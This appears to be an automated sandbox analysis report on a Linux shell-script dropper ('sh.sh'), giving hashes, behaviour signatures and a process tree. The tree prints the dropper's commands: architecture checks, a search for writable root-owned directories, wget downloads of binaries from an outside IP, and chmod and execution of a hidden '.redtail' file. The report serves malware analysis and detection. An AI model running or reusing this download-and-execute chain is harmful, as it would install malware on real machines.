Analysis

  • max time kernel
    33s
  • max time network
    35s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    25-11-2024 16:29

General

  • Target

    sh.sh

  • Size

    1KB

  • MD5

    76d58f7849b2fde18b37f09ced7607de

  • SHA1

    f5f9858f1b5906c33462ec4b85f5cbcac849ad11

  • SHA256

    3501a9f19a8d7e324f23b303a25ff0fb4ea93709f0b620820939fd863d7a9fd6

  • SHA512

    9f1f1047c901b0197e81e76e4eb34931ab2b457990a3d351ab4423bcbbb5c2da4c84bb138947533b41d11711f12c950698ea191892d3f0dde1b4a0fb1988e9af

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sh.sh
    /tmp/sh.sh
    1⤵
    • Writes file to tmp directory
    PID:703
    • /bin/grep
      grep noexec
      2⤵
        PID:712
      • /bin/cat
        cat /proc/mounts
        2⤵
        • Reads runtime system information
        PID:711
      • /usr/bin/awk
        awk "{print \$2}"
        2⤵
        • Reads runtime system information
        PID:713
      • /usr/bin/whoami
        whoami
        2⤵
          PID:719
        • /usr/bin/find
          find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*"
          2⤵
          • Reads runtime system information
          PID:722
        • /bin/uname
          uname -mp
          2⤵
            PID:745
          • /bin/grep
            grep -q x86_64
            2⤵
              PID:747
            • /bin/grep
              grep -q amd64
              2⤵
                PID:749
              • /bin/grep
                grep -q "i[3456]86"
                2⤵
                  PID:752
                • /bin/grep
                  grep -q armv8
                  2⤵
                    PID:754
                  • /bin/grep
                    grep -q aarch64
                    2⤵
                      PID:757
                    • /bin/grep
                      grep -q armv7
                      2⤵
                        PID:759
                      • /usr/bin/wget
                        wget http://45.202.35.190/x86_64
                        2⤵
                        • Writes file to tmp directory
                        PID:761
                      • /bin/cat
                        cat x86_64
                        2⤵
                          PID:781
                        • /bin/chmod
                          chmod +x .redtail
                          2⤵
                          • File and Directory Permissions Modification
                          PID:782
                        • /tmp/.redtail
                          ./.redtail
                          2⤵
                          • Executes dropped EXE
                          PID:784
                        • /usr/bin/wget
                          wget http://45.202.35.190/i686
                          2⤵
                          • Writes file to tmp directory
                          PID:787
                        • /bin/cat
                          cat i686
                          2⤵
                            PID:802
                          • /bin/chmod
                            chmod +x .redtail
                            2⤵
                            • File and Directory Permissions Modification
                            PID:803
                          • /tmp/.redtail
                            ./.redtail
                            2⤵
                            • Executes dropped EXE
                            PID:804
                          • /usr/bin/wget
                            wget http://45.202.35.190/aarch64
                            2⤵
                            • Writes file to tmp directory
                            PID:807
                          • /bin/cat
                            cat aarch64
                            2⤵
                              PID:815
                            • /bin/chmod
                              chmod +x .redtail
                              2⤵
                              • File and Directory Permissions Modification
                              PID:816
                            • /tmp/.redtail
                              ./.redtail
                              2⤵
                              • Executes dropped EXE
                              PID:817
                            • /usr/bin/wget
                              wget http://45.202.35.190/arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:819
                            • /bin/cat
                              cat arm7
                              2⤵
                                PID:820
                              • /bin/chmod
                                chmod +x .redtail
                                2⤵
                                • File and Directory Permissions Modification
                                PID:821
                              • /tmp/.redtail
                                ./.redtail
                                2⤵
                                • Executes dropped EXE
                                PID:822

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • /tmp/aarch64

                              Filesize

                              1.3MB

                              MD5

                              322095f828345179dc422bcf65db4b61

                              SHA1

                              c244dce124772e0d94a01b3bc0d5d005614101b2

                              SHA256

                              992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472

                              SHA512

                              c8da61b2ee95cae3eb62d4985be6eeee41976fa0a69e0c738353e7e179454e8872d52152ca6df54949a6c6dd42f48b0981593c1f4f973e9e1e176ba4ca978f70

                            • /tmp/arm7

                              Filesize

                              1.1MB

                              MD5

                              045daa66263bfd467051c013e9222faf

                              SHA1

                              4b943b14526d7bf7be2b3e3f9af24d1f35015548

                              SHA256

                              d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

                              SHA512

                              bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

                            • /tmp/i686

                              Filesize

                              1.5MB

                              MD5

                              01fc359f540fca7f496b5c4841c67f7e

                              SHA1

                              4689b4afff6f08b8c9e781d07c3a782823a6689f

                              SHA256

                              69dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586

                              SHA512

                              4d7170159ec6a651cd7b8e64ab06aa76f3bb691be70d219a7dbc1116a383f43226ec6815ae51fe23b25c9450f142cba0ba71ce659dae9ca376e97f126e81a4fc

                            • /tmp/x86_64

                              Filesize

                              1.6MB

                              MD5

                              f6634e2fb7872be767a2cb5b1da04103

                              SHA1

                              532037729f2da9fc1341f744e5afa2420bcfebca

                              SHA256

                              29f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b

                              SHA512

                              e1b34b5235ecfe8f74698d10ecf70758adcb5ef2832b3be272fe737770f47daf4974fe6c957ccf24282a1a0af4a4cca393727517ea5ade97504a55b3b6a6ff51